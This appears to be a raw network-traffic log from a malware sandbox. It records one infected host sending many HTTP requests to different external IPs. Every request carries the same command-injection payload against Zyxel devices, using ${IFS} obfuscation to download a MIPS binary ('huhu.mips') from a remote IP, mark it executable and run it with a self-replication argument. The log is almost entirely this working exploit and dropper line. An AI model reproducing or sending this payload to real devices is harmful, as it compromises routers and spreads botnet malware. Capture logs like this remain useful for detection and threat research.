                                                        Feb 2, 2024 06:21:00.750921965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2279192.168.2.143288231.237.168.20443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.750950098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2280192.168.2.1442070152.125.69.133443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.751009941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2281192.168.2.1447372136.42.128.96443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.751050949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2282192.168.2.1456382176.71.176.104443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.751105070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2283192.168.2.1434720188.38.167.38443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.751126051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2284192.168.2.1433030154.25.88.245443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.751188040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2285192.168.2.145198868.176.145.57443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.751210928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2286192.168.2.1460138216.23.78.22443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.751266956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2287192.168.2.1445048182.151.105.218443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.751302004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2288192.168.2.1433528100.26.168.158443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.751359940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2289192.168.2.1450078179.146.255.99443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.751420021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2290192.168.2.143897243.27.132.66443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.751456022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2291192.168.2.14476689.10.142.24443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.751485109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2292192.168.2.145066438.195.87.164443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.751519918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2293192.168.2.1437804220.254.15.110443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.751576900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2294192.168.2.1438236205.153.162.246443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.751606941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2295192.168.2.145659831.19.11.39443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.751653910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2296192.168.2.146008657.75.242.97443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.751698971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2297192.168.2.145016225.152.25.102443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.762161970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2298192.168.2.145187079.57.74.57443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.762202024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2299192.168.2.1451522131.62.54.179443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.762260914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2300192.168.2.1443800189.27.91.83443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.762317896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2301192.168.2.1434804129.225.223.160443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.762392044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2302192.168.2.1449200154.18.65.214443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.762430906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2303192.168.2.145288841.33.31.112443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.762487888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2304192.168.2.144371472.7.118.83443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.762536049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2305192.168.2.1452992110.81.208.94443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.762590885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2306192.168.2.1459486169.26.237.141443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.762639999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2307192.168.2.1434758212.114.248.151443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.762684107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2308192.168.2.1434148114.198.177.44443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.762717962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2309192.168.2.1447034116.251.243.32443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.762748957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2310192.168.2.145510653.243.73.203443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.762794018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2311192.168.2.1443820209.150.123.78443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.762830019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2312192.168.2.1455360157.49.76.142443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.762856960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2313192.168.2.144439623.111.24.179443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.762891054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2314192.168.2.1454442113.121.86.187443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.762929916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2315192.168.2.1442912153.99.132.70443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.762955904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2316192.168.2.144357061.202.60.250443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.763026953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2317192.168.2.1449522188.75.203.158443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.763067961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2318192.168.2.1441920165.132.189.43443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.763099909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2319192.168.2.1446550183.142.165.219443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.763130903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2320192.168.2.1437184146.73.110.80443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.763134956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2321192.168.2.144767444.246.99.183443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.763166904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2322192.168.2.1443010126.40.156.129443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.763215065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2323192.168.2.144363232.238.136.6443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.763246059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2324192.168.2.144027292.51.109.44443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.763246059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2325192.168.2.1438384119.120.65.41443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.763264894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2326192.168.2.145044476.90.138.252443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.763319969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2327192.168.2.14586169.181.126.93443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.763364077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2328192.168.2.145123290.165.39.161443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.763433933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2329192.168.2.1436612220.237.250.190443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.763461113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2330192.168.2.1452728106.212.53.15443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.763519049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2331192.168.2.1444496210.30.31.74443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.763552904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2332192.168.2.1438330133.89.222.37443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.763618946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2333192.168.2.1441072126.129.126.181443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.763699055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2334192.168.2.1452120122.205.137.235443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.763734102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2335192.168.2.145751657.151.227.20443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.763780117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2336192.168.2.1448070216.240.160.204443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.763828039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2337192.168.2.1457986101.153.217.88443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.763849974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2338192.168.2.144547047.122.213.238443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.763911963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2339192.168.2.1456790122.234.71.130443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.763947010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2340192.168.2.146078057.59.220.29443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.763974905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2341192.168.2.1446318124.243.3.230443
                                                        TimestampBytes transferredDirectionData
